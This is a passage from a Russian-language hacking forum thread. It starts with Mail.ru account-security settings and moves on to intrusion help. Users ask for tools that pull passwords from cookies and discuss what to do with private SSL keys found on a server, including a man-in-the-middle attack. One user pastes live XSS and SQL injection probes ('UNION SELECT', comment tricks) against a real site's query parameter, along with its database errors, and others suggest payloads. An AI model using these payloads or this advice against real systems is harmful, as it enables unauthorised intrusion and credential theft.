опции безопасности на майл ру.

Запретить сохранять логин

Если опция "Запретить сохранять логин" включена, то сервер Mail.ru не будет запоминать и автоматически подставлять ваше учетное имя на странице входа в почтовую систему.
Запретить параллельные сессии

При включении опции "Запретить параллельные сессии" сервер Mail.ru будет обнаруживать двух и более одновременно работающих пользователей под одним учетным именем. Если это произойдет, сервер заблокирует более раннюю сессию.
Показывать информацию о последнем входе в систему

Включение опции "Показывать информацию о последнем входе в систему" позволит вам узнать, когда и с какого IP-адреса происходило последнее обращение к вашему почтовому ящику. Данные по входам через веб-интерфейс (HTTP) обновляются в режиме on-line (т.е. во время каждого следующего входа Вы увидите дату, время и IP-адрес предыдущего входа). Данные по входам через почтовые программы (РОР3) обновляются один раз в сутки (т.е. во время каждого входа Вы увидите дату, время и IP-адрес последнего входа за предыдущие сутки).
Использовать cookie для авторизации

Опцию "Использовать cookie для авторизации" предпочтительно не выключать. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. Выключение этой опции нарушает безопасность, так как позволяет передавать информацию на чужие сайты. Выключать ее стоит только при "попадании" в чужой п/я (данная ошибка обычно возникает при неправильно настроенном proxy-сервере).
Сессия только с одного IP-адреса

Опцию "Сессия только с одного IP-адреса" предпочтительно включать всегда. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. При включении этой опции проверяется, что все запросы в сессии идут с того же адреса, с которого она началась, если не с того, то сессия считается неправильной - и отправляет на авторизацию. Выключать опцию стоит только если Вас регулярно "выбрасывает" из п/я на авторизацию.

ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?

http://www.citforum.ru/internet/html/cookie.shtml
http://www.nirsoft.net/web_browser_tools.html

Пипл,нашёл папку на машине:

/usr/local/apache/etc/ssl.all

Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.cr t,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?

Хм... А что ты собрался делать?

Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...

__________________
II venēficus, ī m.
(с лат.) волшебник, чародей

Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно -- ок

На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.

?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'

?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
=> "через order+by показывает 1 поле."
mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

хекерская догадка 45% (с)

Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

здесь проблема в другом.
/* -- # без разници ошибка одна и таже.
как я понял тут только подзапросами можно.
но никак немогу и их использовать.